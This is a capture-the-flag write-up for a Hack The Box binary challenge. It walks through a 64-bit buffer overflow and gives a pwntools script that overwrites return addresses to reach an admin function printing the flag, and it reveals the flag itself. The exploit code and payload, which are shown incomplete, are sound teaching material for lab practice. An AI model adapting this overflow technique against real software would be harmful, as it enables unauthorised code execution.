Space Pirate : Going Deeper
Solved by: Taz34
Here we have a 64 bit binary which takes input as follows:
After playing around with the binary i came across a Segmentation fault, hence we have a buffer overflow exploit here.
So I found the offset to be 50.
Now to understand the working of the binary I opened the binary in Cutter
Here we came across the main function and another interesting function named admin_panel In the admin_panel function we came across an if statement:
From here we can understand that, if we want to print the flag i.e. system(
cat flag
we need to make the if condition false.
So now we can create the payload
payload = b'A'*offset + ret_addr_main + ret_addr_admin_panel + if_arg1 + if_arg3 + if_arg3
payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)
Now we have our payload set, hence the final script:
from pwn import *
#elf = ELF('./sp_going_deeper')
#p = elf.process()
p = remote("", 31239)
payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)
And here the flag is dumped.
Flag: HTB{no_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_flow_r3d1r3ct}